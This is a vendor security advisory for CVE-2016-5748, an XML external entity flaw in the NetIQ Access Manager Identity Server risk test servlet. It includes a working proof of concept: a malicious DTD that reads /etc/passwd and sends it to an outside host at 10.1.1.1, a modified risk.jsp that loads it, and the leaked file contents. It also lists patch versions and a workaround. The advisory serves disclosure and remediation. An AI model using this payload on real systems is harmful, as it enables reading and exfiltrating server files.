Access Manager XXE vulnerability with test risk servlet (CVE-2016-5748)

  • 7017797
  • 01-Jul-2016
  • 29-Aug-2016

Environment

NetIQ Access Manager 4.2
NetIQ Access Manager 4.1
Access Manager Identity Server
CVE-2016-5748

Situation

Access Manager 4.1 and 4.2 support risk based authentication on the Identity Server. Available with this feature is the risk servlet (/nidp/test/risk) that allows administrators and users verify that their risk scores are. It is possible to modify the accompanying JSP page to trigger an External Entity Processing (XXE) vulnerability (https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing).

To do this, one needs access to modify /opt/novell/nids/lib/webapp/jsp/risk.jsp and change the default DTD file (loose.dtd) to point to another DTD file that does more damage eg. with a remotely accessible DTD you can execute an XXE attack that can in turn read the file system and any readable file on the IDP.

a) create sample DTD (test.dtd) on a web server for file access on the attacked system:

pentest@nam:~/neil$ cat test.dtd
<!ENTITY % p1 SYSTEM "file:///etc/passwd"> <!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://10.1.1.1/bla#%p1;'>">%p2;

b) modify the risk.jsp to point to the test.dtd file created on the web server in a) above:

<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://10.1.1.1/test.dtd" > <foo>&e1;</foo>

c) Access the risk servlet at https://login.netiq.com.com/nidp/test/risk where login.netiq.com is the IDP server domain name, and confirm you see thecontents of /etc/password in browser:

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"><SOAP-ENV:Body><SOAP-ENV:Fault><faultcode>Client</faultcode><faultstring>http://10.1.1.1/bla#root:x:0:0:root:/root:/bin/bash
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
haldaemon:x:101:102:User for haldaemon:/var/run/hald:/bin/false

Resolution

Apply 4.2.2 for NAM 4.2; or 4.1.2 Hot Fix 1 for NAM 4.1.

As a workaround, one can also disable the risk.jsp in the web.xml file at /opt/novell/nids/lib/webapp/WEB-INF/web.xml. Simply delete the following lines and restart the IDP server with 'rcnovell-idp restart':

        <!--  To disable the risk module test tool  block below servlet and servlet-mapping tags -->
        <servlet>
                <servlet-name>riskjsp</servlet-name>
                <display-name>test risk group</display-name>
                <jsp-file>
                        /jsp/risk.jsp
                </jsp-file>
        </servlet>